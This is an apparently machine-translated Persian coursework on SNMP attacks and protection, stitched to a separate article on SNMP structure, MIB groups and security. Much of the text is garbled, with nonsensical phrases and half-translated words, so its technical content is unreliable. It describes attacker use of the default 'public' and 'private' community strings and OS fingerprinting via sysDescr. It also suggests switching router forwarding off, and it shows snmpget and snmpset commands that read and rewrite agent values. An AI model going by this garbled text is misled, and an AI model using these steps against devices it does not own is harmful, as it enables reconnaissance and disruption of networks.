پروتکل Snmp و روش های حملات لبه و حفاظت. پروتکل SNMP روش های حملات مرزی و زاخیستو. دلفی، اینترنت و مرضی، پروتکل ها

VISNOVOK
این تحقیق به امنیت منبع تغذیه سازمان ارتباطات لبه با استفاده از پروتکل SNMP اضافی اختصاص یافته است. فرآیند روباتیک ویژگی‌های پروتکل نام‌برده و مشکلات احتمالی خرابی آن را آشکار کرد. برای اثبات مشکل، داده های آماری ارائه شد که قابلیت اطمینان بالای اجرای حملات مرزی را تایید می کند. علاوه بر این، از نظر تئوری می توان اطلاعاتی در مورد ساختار پروتکل، مدار ورودی/خروجی ها و مراحل استخراج ورودی ها از ورودی ها ارائه کرد.
به عنوان بخشی از کار دوره، تجزیه و تحلیلی از حملات احتمالی به پروتکل SNMP انجام شد که در میان آنها می توان حملات Dos، حملات از نوع "سرریز بافر" و ناسازگاری های قالب را مشاهده کرد. البته تهدیدهای بالقوه بسیار بیشتری وجود دارد، اما نگاهی اجمالی به آنها بررسی عمیق و جامع تری را نشان می دهد. نیا.
برای تشویق سیستم به محافظت از تعامل شبکه ای بین مشترکین شبکه، راه هایی برای جلوگیری از حملات به پروتکل SNMP در نظر گرفته شد و مشخص شد که استفاده از مجموعه ای از دارایی ها موثر خواهد بود.
بر اساس تجزیه و تحلیل، مشخص شد که پروتکل SNMP پیامدهای زیادی دارد و پس از تدوین یک سیاست امنیتی و رعایت تمام اصول آن، در مورد این موضوع تصمیم گیری شده است.
به این ترتیب می توانید دستاوردهای هدف و بالاترین هدف را که در ورودی مشخص شده اند یادداشت کنید.

ورود
توسعه سریع فناوری اطلاعات فرصت های جدیدی را برای ذخیره، پردازش و بازیابی داده ها فراهم می کند. از حامل های سنتی اطلاعات و از سرورهای شرکت ها و افراد، انتقال تدریجی به فناوری های راه دور که از طریق اینترنت جهانی پیاده سازی می شوند وجود دارد. خدمات در اینترنت، که اکنون ابزارهای ضروری برای عملکرد روزانه هستند، به طور پویا در حال توسعه هستند، تا جایی که می توان پست الکترونیکی را اضافه کرد. تبادل فایل ها، پیام های صوتی و داده ها با افزودنی های ویدیویی؛ توسعه منابع قدرتمند وب
به نظر بسیاری از فاشیست ها، رکود گسترده فناوری اینترنت نیازمند سیستم هایی برای کنترل موثر دستگاه های لبه است، یکی از ابزارهایی که می تواند با استفاده از پروتکل SNMP پروت، سازماندهی مدیریت و نظارت بر دستگاه های حصارکشی از طریق این پروتکل، عناصر حصارکش را در برابر حملات آسیب پذیر می کند. بنابراین، قدرت فناوری برای جلوگیری از حملات لبه در توسعه سبک خدمات اینترنتی به منصه ظهور می رسد و نیاز به تجزیه و تحلیل جامع دارد. موضوع تحقیق به خودی خود مرتبط است.
بسیاری از نویسندگان توجه خود را به حفاظت از سیستم های هشدار در برابر حملات به پروتکل SNMP اختصاص داده اند، اما هیچ اتفاق نظری در مورد سودمندی SNMP از طریق پیچیدگی امنیت وجود ندارد. بنابراین M. Flenov در کتاب خود "Linux from the Hacker's Eye" کاستی هایی را در این پروتکل دید و استفاده از آن را توصیه نمی کند. اسمیرنوا. ب. کتاب درسی اولیه "تکنولوژی های سوئیچینگ و مسیریابی در شبکه های کامپیوتری محلی" حاوی اطلاعاتی در مورد طرح های انتقال داده قابل آدرس دهی غنی و مدیریت موثر شبکه های شبکه با استفاده از پروتکل SNMP اضافی است، و همچنین می توانید ایمنی مواد غذایی را در رکود خود مشاهده کنید. . بررسی بیشتر ادبیات تخصصی و اینترنت نیاز به ردیابی قدرت اتصال ایمن به پروتکل SNMP به منظور تصمیم گیری در مورد سودمندی این منبع را تأیید کرد. مبنای این تصمیم، تحلیل حملات احتمالی و اثربخشی روش‌های شکست آنها خواهد بود.
بررسی متا - برای انجام یک تجزیه و تحلیل جامع از حملات احتمالی به پروتکل SNMP و روش های مقابله.
برای رسیدن به علامت، به یک دستور low نیاز دارید:
1. مروری بر ادبیات و منابع اینترنتی در مورد سازماندهی ارتباطات لبه به لبه ایمن بر اساس پروتکل SNMP انجام دهید.
2. درک نیاز به توسعه روش های حمله به پروتکل SNMP و راه های شکست آنها.
3. ویژگی های مدیریت پروتکل SNMP را ببینید.
4. تجهیزات پروتکل SNMP را تجزیه و تحلیل کنید.
5. روش هایی را برای جلوگیری از حملات به پروتکل SNMP شرح دهید.
هدف نظارت پروتکل SNMP است.
موضوع بررسی روش‌های حملات لبه‌ای به پروتکل SNMP و روش‌های شکست آن‌ها است.
روش تحقیق: تجزیه و تحلیل، ترکیب، انتقال اطلاعات.
کار دوره از یک ورودی، دو بخش و بخش اصلی تشکیل شده است. بخش اول به تشریح نظری مسئله اختصاص دارد. بخش دیگر شامل تجزیه و تحلیل حملات احتمالی و روش های شکست آنها است.

ZMIST
ورودی 3
1. از لحاظ نظری مشکلات روش های پیشرفته حملات بر پروتکل SNMP
1.1 نیاز به زنده کردن روش های حملات بر پروتکل SNMP 5
1.2 پروتکل SNMP: شرح، هدف 7
2. تجزیه و تحلیل حملات به پروتکل SNMP و روشهای ضد زمان
2.1 تکنیک های حمله به پروتکل SNMP و روش های پیشبرد 11
2.2 راه برای مقابله با حملات در پروتکل SNMP 15
VISNOVOK 20
LIST OF VIKORISTANIH JEREL 21

فهرست VIKORISTANIH JEREL
اقدامات نظارتی
1. قانون فدرال فدراسیون روسیه مورخ 27 ژوئن 2006. N 149-FZ درباره اطلاعات، فناوری اطلاعات و حفاظت از اطلاعات
فهرست متون تخصصی و علمی
2. Blank-Edelman D. Perl برای مدیریت سیستم، M: symbol-Plus، 2009. - 478 p.
3. Borodakiy V.Yu. تمرین و چشم انداز ایجاد اطلاعات دزدیده شده و زباله های محاسباتی بر اساس MSS OGV / V.Yu. بوروداکی، آ.یو. دوبرودف، پ.ا. Nashchokin // مشکلات فعلی در توسعه سیستم های فناوری امنیت دولتی، ارتباطات ویژه و امنیت اطلاعات ویژه: هشتم کنفرانس علمی بین رشته ای همه روسی: مواد و شواهد (اورل، 13-14 20 13 روبل). - حدود 10 ساله قسمت 4 / برای zag.red. V.V. میزروف. - عقاب: آکاده خدمات تعرفه فدرال من روسیه، 2013.
4. Grishina N.V سازماندهی یک سیستم پیچیده امنیت اطلاعات. - M.: Gelios ARV، 2009. - 256 p.
5. Douglas R. Mauro Fundamentals of SNMP, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. کولگین ام.وی. اندازه گیری های کامپیوتری تمرین شما را بیدار می کند. برای fakhivtsіv، سنت پترزبورگ: پیتر، 2003.-462 ص.
7. Mulyukha V.A. روش های حفاظت از اطلاعات کامپیوتری Mizhmerezheve ekranuvannya: Navchalniy posibnik / Mulyukha V.A.، Novopashenny A.G.، Podgursky Yu.E. - سن پترزبورگ: Vidavnitstvo SPbSPU، 2010. - 91 p.
8. Olifer V. G.، Olifer N. P. اقدامات کامپیوتری. اصول، فناوری ها، پروتکل ها. - چهارم – سن پترزبورگ: پیتر، 2010. -902 ص.
9. فن آوری های سوئیچینگ و مسیریابی در شبکه های کامپیوتری محلی: راهنمای اولیه / Smirnova. St ta in; ویرایش A.V. پرولتارسکی - M.: نمای MDTU im. نه. باومن، 2013. – 389 ص.
10. Flenov M. Linux ochima Hacker, St. Petersburg: BHV-St. Petersburg, 2005. – 544 p.
11. Khorev P.V. روش های حفاظت از اطلاعات در سیستم های کامپیوتری - م.: مرکز علمی فرهنگستان، 1384. -205 ص.
12. Khoroshko V. A., Chekatkov A. A. روشها و روشهای حفاظت از اطلاعات، K.: Junior, 2003. – 504 p.
اینترنت-dzherela
13. IDS/IPS - سیستم‌های شناسایی و جلوگیری از مزاحمان [منبع الکترونیکی] URL: http://netconfig.ru/server/ids-ips/.
14. تحلیل تهدیدات اینترنتی در سال 2014. حملات DDoS هک کردن وب سایت ها. [منبع الکترونیکی]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolishchak A. تغییرپذیری ردیف قالب [منبع الکترونیکی]. آدرس اینترنتی: https://securityvulns.ru/articles/fsbug.asp
16. پرشا مایل، شماره 04، 2013 [منبع الکترونیکی]. آدرس اینترنتی: http://www.lastmile.su/journal/article/3823
17. خانواده استانداردهای SNMP [منبع الکترونیکی]. آدرس اینترنتی: https://ua.wikibooks.org/wiki /SNMP_standards_family
ادبیات خارجی
18. "CERT Advisory CA-2002-03: آسیب پذیری های متعدد در بسیاری از پیاده سازی های پروتکل مدیریت ساده شبکه (SNMP)"، 12 فوریه. 2002، (11 مارس 2002 فعلی

SNMP- این یک پروتکل در سطح برنامه است، زیرشاخه هایی برای پشته TCP/IP، که اجرای آن و پشته های دیگر مانند IPX/SPX را می خواهند. پروتکل SNMP برای بازیابی اطلاعات از دستگاه های شبکه در مورد وضعیت، عملکرد و سایر ویژگی هایی که در پایگاه اطلاعات مدیریت (MIB) ذخیره می شود، استفاده می شود. سادگی SNMP تا حد زیادی در سادگی SNMP MIB، به ویژه اولین نسخه های MIB I و MIB II منعکس شده است. علاوه بر این، خود پروتکل SNMP نیز بسیار ساده است.

عامل پروتکل SNMP یک عنصر توانبخشی است، مدیرانی که تحت تأثیر رنگ صورتی و مارشمالوهای مار mib і tsim قرار می گیرند می توانند عملکردهای عملکردهای مدیریت را انجام دهند.

عملیات مدیریت اصلی به مدیر منتقل می شود و عامل SNMP عمدتاً نقش غیرفعال را بر عهده می گیرد و مقادیر داده های آماری انباشته شده را برای ذخیره سازی به مدیر منتقل می کند. با این دستگاه، با حداقل سرمایه گذاری در پشتیبانی از پروتکل پشتیبانی کار می کند. این بدان معنی است که تمام تلاش آن برای تعیین وظایف اصلی آن یعنی یک روتر، پل یا هاب لازم است و عامل به جمع آوری آمار و ذخیره آنها و انتقال آنها به مدیر سیستم مدیریت مشغول است.

SNMP -نوع پروتکل tse "ask-vіdpіd"، سپس شخص می پرسد که چه چیزی برای مدیر بهتر است، نماینده مسئول انتقال شهادت است. ویژگی خاص پروتکل سادگی فوق العاده آن است - فقط چند دستور را شامل می شود.

دستور Get-request توسط مدیر برای استخراج مقدار هر شیئی از طرف خود از عامل استفاده می شود.

دستور GetNext-request توسط مدیر برای حذف مقدار شی فعلی (بدون درج نام آن) هنگام مشاهده جدول شیء استفاده می شود.

به دنبال دستور Get-response، عامل SNMP پاسخی به دستورات Get-request یا GetNext-request برای مدیر ارسال می کند.

دستور Set به عنوان مدیر برای تغییر مقدار هر شیء استفاده می شود. به دنبال کمک دستور Set، باید از دستگاه استفاده کنید. عامل مسئول درک ارزش حسی شی مورد استفاده برای پردازش توسط دستگاه است و بر اساس این مقدار، ورودی واقعی را که کنترل می کند - فعال کردن پورت، اختصاص پورت به VLAN خواننده و غیره است. دستور Set همچنین برای نصب تنظیمات مفید است و در زمان Vikonanne عامل SNMP مسئول ارسال مدیر 24/7 است. واکنش های احتمالی ممکن است شامل مقداردهی اولیه عامل، راه اندازی مجدد عامل، خاتمه اتصال، تمدید اتصال، احراز هویت نامعتبر و از دست دادن نزدیکترین روتر باشد. به محض این که این اتفاق می افتد، عامل وقفه را آغاز می کند.

نماینده با تیم تراپ تماس می گیرد تا مدیر را از وضعیت خاصی مطلع کند.

نسخه SNMP v.2 دستور GetBulk را به این مجموعه اضافه می کند که به مدیر اجازه می دهد تعدادی از مقادیر تغییر را در یک درخواست بازیابی کند.

این مقاله به پروتکل SNMP (پروتکل مدیریت شبکه ساده) اختصاص دارد - یکی از پروتکل های مدل OSI، که عملاً توسط اسناد در جهان RU-no پوشش داده نمی شود. نویسنده سعی کرده این خلاء را پر کند و به خواننده فضایی برای تفکر و تأمل در خود بدهد، غذای خوب و شاید جدید برای شما. این سند تظاهر نمی‌کند که «اسناد برای توسعه‌دهنده» نامیده می‌شود، بلکه صرفاً نظر نویسنده را منعکس می‌کند، تا جایی که امکان برجسته کردن جنبه‌های کار با این پروتکل وجود دارد، تا نقاط ضعف آن، تأثیر «امنیت» را نشان دهد. ” سیستم، به منظور بررسی مجدد سازنده یامی تا این دلیل را توضیح دهد.

وظیفه

پروتکل SNMP برای تجدید نظر در عملکرد روترها و پل های لبه گسترش یافته است. در طول سال ها، دامنه پروتکل به سایر دستگاه های شبکه مانند هاب ها، دروازه ها، سرورهای ترمینال، سرورهای LAN Manager، ماشین های ویندوز NT و غیره گسترش یافته است. علاوه بر این، پروتکل اجازه می دهد تا قبل از عملیاتی شدن دستگاه های تعیین شده، تغییرات ایجاد شود.

تئوری

افراد تعامل کننده اصلی در پروتکل عوامل و سیستم های کنترل هستند. اگر به دو مفهوم "مشتری-سرور" من نگاه کنیم، نقش سرور توسط عوامل ایفا می شود و خود دستگاه ها برای آموزش، پروتکل تجزیه و تحلیل ما را توسعه می دهند. بدیهی است که نقش مشتریان به سیستم های کنترل اختصاص داده می شود - افزونه های میانی لازم برای جمع آوری اطلاعات در مورد عملکرد عوامل. علاوه بر این دو موضوع، مدل پروتکل را می توان دو موضوع دیگر نیز نامید: اطلاعات کنترلی و خود پروتکل تبادل داده.

"چرا نیاز به تجربه مالکیت داشتی؟" - فید V. من سعی می کنم این غذا را روشن کنم. گاهی اوقات در فرآیند عملکرد شبکه نیاز به تعیین پارامترهای خاص دستگاه مانند اندازه MTU، تعداد بسته های دریافتی، پورت های فعال و سیستم عامل نصب شده بر روی دستگاه وجود دارد. این نسخه از شما می‌خواهد تا بررسی کنید که آیا گزینه ارسال بر روی دستگاه فعال است یا خیر. برای این منظور، کلاینت های SNMP به بهترین وجه مناسب هستند.

علاوه بر این، پروتکل دارای ویژگی مهم دیگری است، یعنی توانایی تغییر داده ها بر روی عامل ها. احمقانه است که اجازه دهید مطلقاً هر پارامتری را تغییر دهید، حتی اگر اصلاً مهم نباشد، و تعداد این پارامترها که عملیات نوشتن برای آنها مجاز است به سادگی یک تار است. در نگاه اول، کل تئوری امنیت مرزی ساده به نظر می رسد، اما وقتی به ته غذا رسیدید، مشخص می شود که همه چیز آنقدرها که در نگاه اول به نظر می رسد نادیده گرفته نشده است. "اگر از گرگ ها می ترسی، به جنگل نرو." حتی با تلاش اندک از طرف مدیر، خطر تکمیل موفقیت آمیز حمله را می توان به حداقل کاهش داد. این جنبه بعدا مورد بحث قرار خواهد گرفت.

ما بر روی اطلاعاتی که می توان توسط سیستم مدیریت از طریق SNMP به دست آورد تمرکز می کنیم. تمام اطلاعات مربوط به اشیاء سیستم عامل در به اصطلاح MIB (پایگاه اطلاعات مدیریت) - پایگاه اطلاعات مربوطه موجود است، به طوری که MIB مجموعه ای از اشیاء موجود برای عملیات نوشتن خواندن برای هر مشتری خاص است، بسته به اینکه در مورد ساختار و اهمیت خود مشتری. تشخیص تعداد بسته های رها شده از سرور پایانه ممکن نیست، زیرا این داده ها مانند اطلاعات مربوط به سرپرست روتر، ارتباط مورد نظر را با هیچ عملیاتی ندارند. به همین دلیل است که سیستم مسئول این است که دقیقاً چه چیزی را از چه کسی بپرسد. در حال حاضر چهار پایگاه MIB وجود دارد:

1. اینترنت MIB یک پایگاه داده از اشیاء برای اطمینان از عیب یابی و مشکلات پیکربندی است. شامل 171 شی (از جمله اشیاء MIB I).
2. LAN manager MIB - پایگاه داده 90 شی - رمز عبور، جلسات، حساب ها، منابع پنهان.
3. WINS MIB - پایگاه داده شی، عملکردهای ضروری سرور WINS (WINSMIB.DLL).
4. DHCP MIB - یک پایگاه داده از اشیاء، عملکردهای ضروری یک سرور DHCP (DHCPMIB.DLL)، یک سرویس برای شناسایی پویا آدرس IP یک شبکه.

همه نام های MIB از یک ساختار سلسله مراتبی پیروی می کنند. ده نام مستعار ریشه وجود دارد:

1. سیستم - این گروه MIB II حاوی این اشیاء است که برای ذخیره اطلاعات مربوط به سیستم (نسخه سیستم عامل، ساعات کار و غیره) خدمت می کنند.
2. رابط ها - شامل 23 شی، آمار لازم از رابط های لبه عوامل (تعداد رابط ها، اندازه MTU، سرعت انتقال، آدرس های فیزیکی و غیره).
3. AT (3 شی) - نشان دهنده آدرس پخش است. دیگر خبری از ویکورییسم نیست. Bula در MIB I گنجانده شده است. مثالی برای استفاده از اشیاء AT می تواند یک جدول ARP ساده باشد (جزئیات بیشتر در مورد پروتکل ARP را می توانید در مقاله "پروتکل ARP غیر استاندارد" بخوانید که در وب سایت www. uinc.ru در بخش "مقالات") آدرس فیزیکی (MAC) کارت های لبه آدرس IP ماشین ها. با SNMP v2، این اطلاعات برای پروتکل های خاص به MIB منتقل شده است.
4. IP (42 شی) - داده های مربوط به عبور بسته های IP (تعداد درخواست ها، خروجی ها، بسته های حذف شده).
5. ICMP (26 شی) - اطلاعات در مورد پیام های کنترل (پیام های ورود / خروج، پیام ها و غیره).
6. TCP (19) - هر چیزی که با یک پروتکل انتقال تک نام مرتبط است (الگوریتم ها، ثابت ها، اتصالات، پورت های باز و غیره).
7. UDP (6) - مشابه پروتکل UDP (دیتاگرام های ورودی/خروجی، پورت ها، انتقال ها).
8. EGP (20) - داده های مربوط به ترافیک پروتکل دروازه خارجی (توسط روترها احشاء می شود، اشیا اطلاعات مربوط به کارت های دریافتی/ارسالی/رد شده را ذخیره می کنند).
9. انتقال - برای MIB های خاص رزرو شده است.
10. SNMP (29) - آمار از SNMP - بسته های ورودی/خروجی، جداسازی اندازه بسته، پردازش داده، پردازش داده و موارد دیگر.

پوست آنها شبیه درختی است که رو به پایین رشد می کند (سیستم به طرز دردناکی در مورد سازمان DNS حدس می زند). به عنوان مثال، به آدرس مدیر می توانیم به مسیر زیر برویم: system.sysContact.0، system hour system.sysUpTime.0، توضیحات سیستم (نسخه، هسته و سایر اطلاعات در مورد سیستم عامل): system.sysDescr.0. از طرف دیگر، همان داده ها را می توان در نماد نقطه مشخص کرد. بنابراین system.sysUpTime.0 مقدار 1.3.0 را نشان می دهد، بنابراین سیستم دارای شاخص "1" در گروه های MIB II است و sysUpTime دارای شاخص 3 در سلسله مراتب گروه سیستم است. صفر در پایان راه برای صحبت در مورد نوع اسکالر داده ای که ذخیره می شود. موارد ارسالی به لیست جدید (256 شیء MIB II) را می توانید در انتهای مقاله در بخش "ضمیمه" بیابید. در فرآیند ربات، نام اشیاء نمادین انتخاب نمی شود، اگر مدیر به جای پارامتر system.sysDescr.0 از عامل بپرسد، به ترتیب درخواست، پیام ارسال شده به شی به "1.1.0" تبدیل می شود. ، و "همانطور که هست" منتقل نمی شود. در مرحله بعد، نگاهی به دستور BULK خواهیم داشت و سپس متوجه خواهیم شد که چرا اینقدر مهم است. با این کار، مرور کلی خود را از ساختار MIB II تکمیل می کنیم و به شرح تعامل بین مدیران (سیستم های کنترل) و عوامل می پردازیم. در SNMP، کلاینت با استفاده از اصل قدرت دریافت با سرور تعامل دارد. عامل تولید به خودی خود تنها اقدام خود را آغاز می کند که به آن سرریز خمیر می گویند (در برخی ادبیات، «تله» به معنای خمیر است). علاوه بر این، تمام اقدامات نمایندگان به پاسخ به درخواست های ارسال شده توسط مدیران خلاصه می شود. مدیران فضای بیشتری برای خلاقیت دارند و می توانند در چندین نوع ورودی شرکت کنند:

• GetRequest - اطلاعاتی را از عامل در مورد یک تغییر درخواست می کند.
• GetNextRequest - به نماینده درخواستی برای ارائه اطلاعات در مورد تغییر آینده (در سلسله مراتب) می دهد.
• GetBulkRequest - جمع آوری داده ها را می خواهد. هنگامی که چنین عاملی حذف می شود، انواع داده های موجود در رکورد را برای سازگاری با داده های جدول خود بررسی می کند و حلقه ساختار را با مقادیر پارامتر پر می کند: for(repeatCount = 1; repeatCount< max_repetitions; repeatCount++) Теперь представьте себе запрос менеджера на получение списка из сотни значений переменных, посланный в символьном виде, и сравните размер такового с размером аналогичного запроса в точечной нотации. Думаю, Вы понимаете, к чему привела бы ситуация, если бы символьные имена не преобразовывались вышеуказанным образом.
• SetRequest – گزینه ای برای تنظیم مقدار به مقدار دلخواه.

علاوه بر این، مدیران می توانند اطلاعات یک به یک در مورد MIB محلی خود مبادله کنند. این نوع درخواست InformRequest نامیده می شود.

من مقادیر ثابت های عددی را برای همه انواع پرس و جو می دهم:

#define SNMP_MSG_GET (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x0)
#define SNMP_MSG_GETNEXT (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x1)
#define SNMP_MSG_RESPONSE (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x2)
#define SNMP_MSG_SET (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x3)
/* PDU برای SNMPv1 */
#define SNMP_MSG_TRAP (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x4)
/* PDU برای SNMPv2 */
#define SNMP_MSG_GETBULK (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x5)
#define SNMP_MSG_INFORM (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x6)
#define SNMP_MSG_TRAP2 (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x7)

محور در اینجا به بخش مهم دیگری متصل می شود، همانطور که می دانید روی خمیر 2 ثابت عددی وجود دارد. در واقع، 2 نسخه اصلی از پروتکل SNMP (v1 و v2) وجود دارد و مهمترین آنها آنهایی هستند که دیوانه نیستند (در واقع، نسخه های بسیار بیشتری وجود دارد - فقط SNMP v2 (p | c | u) و غیره. تمام تغییرات باید به صورت ناچیز تکمیل شوند، زیرا، به عنوان مثال، مقدمه md5 و غیره را پشتیبانی می کند). SNMP پروتکلی برای مانیتورینگ و عیب یابی است که در مواقعی که یکپارچگی مسیرها از بین می رود با مسائل بیمه همراه است و در چنین شرایطی لازم است از کمترین پروتکل حمل و نقل مناسب برای تجهیزات استفاده شود، بنابراین می توانید Ir bov را انتخاب کنید. zrobleniya u bіk UDP. این بدان معنا نیست که پروتکل دیگری نمی تواند بسته های SNMP را حمل کند. این می تواند پروتکل IPX باشد (به عنوان مثال، در شبکه های NetWare)، و حمل و نقل می تواند توسط کارت های اترنت و شبکه های ATM انجام شود. مهمترین ویژگی پروتکل این است که انتقال داده بدون تنظیم اتصال انجام می شود.

فرض کنید یک مدیر تعدادی بسته را برای نمایندگی های مختلف ارسال می کند، سیستم های مدیریت چگونه می توانند تعیین کنند که کدام بسته برای نمایندگان 1 و 2 ارسال می شود؟ و به آن بسته پوستی یک شناسه آهنگ اختصاص داده می شود - یک مقدار عددی. هنگامی که عامل دستور را از مدیر حذف می کند، یک پاسخ تولید می کند و مقدار ID را بدون حذف دستور (بدون تغییر آن) در بسته وارد می کند. یکی از مفاهیم کلیدی برای درک در SNMP، مفهوم گروه است. روال اجازه دادن به یک مدیر بررسی ساده موقعیت او در گروه آواز و لیستی است که نماینده دارد. اگر نماینده گروه مدیر را در لیست خود نشناسد، تعامل بیشتر آنها غیرممکن است. چند بار نسخه اول و دوم SNMP را امتحان کرده ایم؟ احترام زیادی برای کرامت بین آنها وجود دارد. اول از همه، لطفاً توجه داشته باشید که SNMP v2 از ترافیک رمزگذاری شده پشتیبانی می کند که در حین پیاده سازی از الگوریتم های DES و MD5 برای آن استفاده می شود. این به این معنی است که هنگام انتقال داده ها، مهم ترین داده ها از جمله اطلاعات مربوط به گروه های اندازه گیری برای بو کردن در دسترس نیستند. همه اینها منجر به افزایش ترافیک و ساختار پیچیده تر بسته شد. به خودی خود، در عین حال، v2 در واقع هیچ جا استفاده نمی شود. ماشین هایی که ویندوز NT دارند از SNMP نسخه 1 استفاده می کنند. با این دستور، در نهایت به مهمترین بخش آمار و مشکلات امنیتی می رویم. بیایید در مورد آن صحبت کنیم ...

تمرین و ایمنی

امروزه، تدابیر امنیتی از اهمیت ویژه ای برخوردار است، به خصوص در مورد پروتکل های انتقال داده، به ویژه در شبکه های شرکتی. پس از درک کامل SNMP v1/v2، مشخص می‌شود که توسعه‌دهندگان پروتکل در پایان به این موضوع فکر کرده‌اند، یا به شدت تحت فشار شرایط پروژه %% قرار گرفته‌اند. این احساس رو به رشد وجود دارد که پروتکل بیمه کار در میان به اصطلاح "میزبان های قابل اعتماد" قرار دارد. بدیهی است که یک ویژگی مجازی وجود دارد. مردم، به طور دقیق تر، به عنوان آدرس های IP، که حاکم آن قصد دارد منفعت را از بین ببرد، یا صرفاً با از بین بردن کار برخی اقدامات، مدیر را آزار دهد. جای این آدم بایستیم. نگاه به تغذیه چه کسی را می توان به دو نکته کاهش داد:

• الف) در مقام «فال‌گو» هستیم. با چه رتبه ای می توانیم حق سیاه خود را کسب کنیم؟ ما از قبل فرض می کنیم که آدرس دروازه را می دانیم. طبق RFC، سیستم کنترل از طریق پورت 161 (UDP) به عامل متصل می شود. واضح است که برای کار موفق باید گروه را بشناسید. در اینجا شرور توسط کسانی که اغلب مدیران را از معانی (نام) گروه های اختصاص داده شده به تنظیمات محروم می کنند، کمک می کنند و برای تنظیمات SNMP دو گروه وجود دارد - "خصوصی" و "عمومی". اگر مدیر چنین تحولی را منتقل نکند، شخص نامهربان می تواند ناسازگاری های زیادی را برای او ایجاد کند. ظاهرا پروتکل SNMP بخشی از FingerPrintering است. به عنوان بخشی از گروه سیستم MIB II، می توانید اطلاعات زیادی در مورد سیستم به دست آورید. چه چیزی را می‌خواهید پارامتر فقط خواندنی sysDescr داشته باشید. حتی اگر دقیقاً نسخه نرم افزار را بشناسید، این احتمال وجود دارد که ویژگی های vikoryst برای سیستم عامل میزبان کنترل کامل سیستم را از دست بدهد. من ویژگی فقط خواندنی این پارامتر را بیهوده حدس زدم. حتی بدون استفاده از خروجی های snmpd (در سیستم عامل یونیکس مانند)، نمی توان این پارامتر را تغییر داد، در غیر این صورت عامل نمی تواند تمام داده های لازم را در اختیار مهاجم قرار دهد. همچنین لازم نیست فراموش کنید که فروش نمایندگی‌های ویندوز بدون کدهای انتشار ارائه می‌شود و آگاهی از سیستم‌عامل یک درصد موفقیت برای حمله 50 درصد است. علاوه بر این، به یاد داشته باشید که برخی از پارامترها دارای ویژگی rw (خواندن-نوشتن) هستند و در میان این پارامترها - فوروارد کردن! میراث تنظیم حالت "notForwarding(2)" را بیابید. به عنوان مثال، لینوکس یک نرم افزار پیاده سازی برای SNMP به نام ucd-snmp دارد که به شما امکان می دهد با ارسال یک درخواست خاص، اسکریپت ها را از راه دور روی سرورها اجرا کنید. فکر می‌کنم همه متوجه شده‌اند که «کاستی‌های مدیر» می‌تواند به چه عواقبی منجر شود.
• ب) مهاجم بر روی یک ماشین محلی اجرا می شود. در این صورت اعتبار ادمین به شدت افزایش می یابد. حتی اگر در یک بخش از شبکه باشید، می‌توانید به راحتی نام گروه‌ها و بدون آنها اطلاعات سیستم را استشمام کنید. در مورد تمام آنچه در بند (الف) گفته شد نیز همینطور است.

بیایید به «کارهای عملی برای انجام دادن» برویم. چه چیزی ممکن است نیاز داشته باشید؟ ما یک برنامه امنیتی در پیش داریم. می توانید به آن برسید. به عنوان مثال، من از سیستم عامل لینوکس استفاده می کنم، اما دستور دستور شبیه به Windows PP است.

نصب پکیج استاندارد است:

gunzip udc-snmp-3.5.3.tar.gz
tar-xvf udc-snmp-3.5.3.tar
سی دی udc-snmp-3.5.3
./پیکربندی
ساختن
را نصب کنید

شروع دیمون (عامل)

پس از نصب برنامه های زیر در اختیار شما قرار می گیرد:

snmpget
snmpset
snmpgetnext
snmpwalk
snmpbulkwalk
snmpcheck
snmptest
snmpdelta
snmpnetstat snmpstatus
snmptable
snmptrap
snmptransstat
و دیو
snmptrapd

این شگفت انگیز است که چقدر توصیفات این عملیات عملی به نظر می رسد.

درخواست GetRequest توسط برنامه یکنام snmpget پیاده سازی می شود

برای حذف اطلاعات غیر ضروری دستور زیر را وارد کنید:

[ایمیل محافظت شده]:~# snmpget 10.0.0.2 public system.sysDescr.0

آنچه سرور باید اطلاع دهد:

system.sysDescr.0 = سخت افزار: x86 Family 6 Model 5 Stepping 0 AT/AT COMPATIBLE - نرم افزار: Windows NT نسخه 4.0 (شماره ساخت: 1381 Uniprocessor Free)

(درست نیست - این اشتباه است) در غیر این صورت

system.sysDescr.0 = Linux darkstar 2.4.5 #1 SMP جمعه 17 اوت 09:42:17 EEST 2001 i586

درست مثل آن - منبع بینش.

فرض کنید می خواهیم تنظیمات عامل را تغییر دهیم. من در شرف شروع عملیات هستم:

[ایمیل محافظت شده]:~# snmpset 10.0.0.2 public system.sysContact.0 s [ایمیل محافظت شده]

و جواب را حذف می کنیم:

system.sysContact.0 = [ایمیل محافظت شده]

فهرست اشیاء MIB II با ویژگی‌ها را می‌توان در دستورالعمل‌های مشخص‌شده در «افزودن» یافت.

من فکر می کنم زمان آن فرا رسیده است که نگاهی به SNMP در سطح بسته بیندازیم. این بسته توسط Niffer NetXRay در رابط edge agent گرفته شده است:

مانند باچیمو، عمل نیز از نظریه دور نیست. لطفاً توجه داشته باشید که شناسه درخواست و پارامترها درخواست شده است. در تصویر کامل می توانید پشته پروتکل را ببینید - از فریم های اترنت، از طریق UDP به خود پروتکل مدیریت شبکه ساده می رسیم:

و این بسته از رابط مدیر بازیابی شد:

همانطور که می دانید، نام گروه کاملاً رمزگذاری نشده است (منظور شما از شماره نسخه پروتکل: 1 چیست). من می خواهم به این نکته اشاره کنم که به دلیل مشخصات پروتکل، بسته های SNMP منشاء مشخصی ندارند. واضح است که حد مجاز برابر با UDP است که بیش از 65507 بایت است، اما خود پروتکل حداکثر مقدار متفاوتی را اعمال می کند - بیش از 484 بایت. مقدار نصب شده و مقدار هدر بسته (headerLength) ندارد.

